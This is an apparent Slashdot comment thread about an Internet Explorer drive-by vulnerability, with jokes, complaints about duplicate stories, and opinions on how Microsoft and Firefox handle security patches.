Check out Microsoft's other screwups

[yubbers9]

They're here: http://malfy.org/

You can make an exploit if you want to

[MarkByers]

Security companies say that no exploits using the "daxctle" vulnerability have yet been found in the wild

But code that could be used to create an exploit has been posted, which is what I think GP was referring to.

Gangsta h4xx0rz

[wboelen]

drive-by takeover

Yeah homies let's go pop them unsuspecting computer users with da intratubes! Show 'em what bangin' is about.

Dupe!

[Overly+Critical+Guy]

I call dupe! Slashdot just reported on an IE exploit, and before that, had another IE exploit post. They do this every month, in fact. Why don't these editors do their jobs and stop reporting the same story repeatedly?!

Critical and Highly Critical?

[ninja_assault_kitten]

If that's what they're calling a vulnerability that requires user interaction, what would they rate something like a modern day Sapphire or Blaster? Give be a break. It's just another browser hole with exploit code in the wild. Medium severity at best.

The real difference between Firefox and MSIE

[Myria]

If you look at Firefox security bugs and IE security bugs, you'll see that there are more Firefox bugs than MSIE bugs in the exploit lists. There is, however, a big difference.

When Microsoft finds a security hole themselves, they don't tell anyone, and they don't release a patch. They fix it in the tree for the next release of the OS. The only time they release a patch is when someone else finds the bug. The reason they do this is because if they release a patch, people will "bindiff" it against the previous version and find what is changed so that they can make exploits to use against unpatched users. You can't realistically "bindiff" XP vs. Vista, so they can obscure their security updates inside Vista.

Firefox instead will issue patches no matter who finds them. This is why Firefox appears to have more bugs - you always see them get fixed.

Melissa

Plugin for IE

[univgeek]

Or whatever they are called.

Why do people use IE? Mostly because of Intranet sites which server up IE only content and work badly or not-at-all with other browsers. How 'bout an IE plugin which opens only Intranet/trusted sites in IE and opens all else in an external safe browser? Or is this unlikely to be useful?

Re:Plugin for IE

[Verunks]

you can use ietab to embed ie into firefox and use it when you wish or automatically use it when you go to some sites like windowsupdate or other custom sites

Re:Plugin for IE

Its a constant stream of articles just like this which made me discontinue business with three internet stock broker / banking concerns.

Despite my constant whining to them regarding them taking security seriously, the only people I could talk to that were high enough to make a difference were also so high up that my concerns, as a lowly customer, were not important. Little guys like me don't mean all that much to multi-billion dollar concerns. They incessantly lace their site with proprietary stuff that forces me to use IE, as well as running JavaScript on, when simple CGI over the SSL link would have worked just fine. They would even use JavaScript links instead of HTML links just so I could not even navigate the site without enabling JavaScript.

It's obvious to me that their expertise is NOT in coding or computer security, rather it's in the psychological maneuvering and office politics to find an executive that considers them worthy of a salary dozens of times what I would make.

The weirdest thing was that the big companies I had to discontinue business with are supposedly the old-time leaders in the brokerage industry... and the guy I run with now is pretty new at it, compared to the old timers.

He's not perfect ( at least in my book, anyway ) but best I've seen so far.

What is it with big companies that makes them so lackadaisical and so lacking in common sense regarding other people's money? Is it that its far easier to issue a EULA disclaiming responsibility than to do things simple and elegantly, using well known and documented methods?

Some of the business sites rank right up there with the porn industry in the amount of unverifiable software I have to install on my machine in order to access their site.

Moderators on crack

[trezor]

Me saying that Windows, the worlds most used, sold and deployed user-focused OS, can be used relatively securely, and that people should choose the tool/OS that does the job that needs doing best, I get modded troll, while a Linux fanboy claiming that Linux solves all problems in the world, regardless of what the actual job at hand is (without any actual backing ofcourse) doesn't.

Great job, mods! Now you can mod this offtopic, trolling flamebait. I'm sure that the burning karma will fit right into your crackpipe.

Re:kills windows

[99BottlesOfBeerInMyF]

I for one am actually surprised this hasn't happened yet. Say a worm that infects 20 others then formats the hard drive. Or perhaps break into a botnet (they are not that secure) and wipe some millions of Windows PCs at once. It would not be hard to do, let your Windows get infected, figure out how they control it and go off and get control. Time will tell, but I suspect sooner or later someone is going to do it.

Yeah but who will notice? Windows is hosed and won't boot? Well, time for a re-install. Honeypots would probably be how people found out about such a thing.

Safety first...

[sii074306]

IE does not safe anymore.
why hacker were borned in this world?
why they do not do anything else than hack?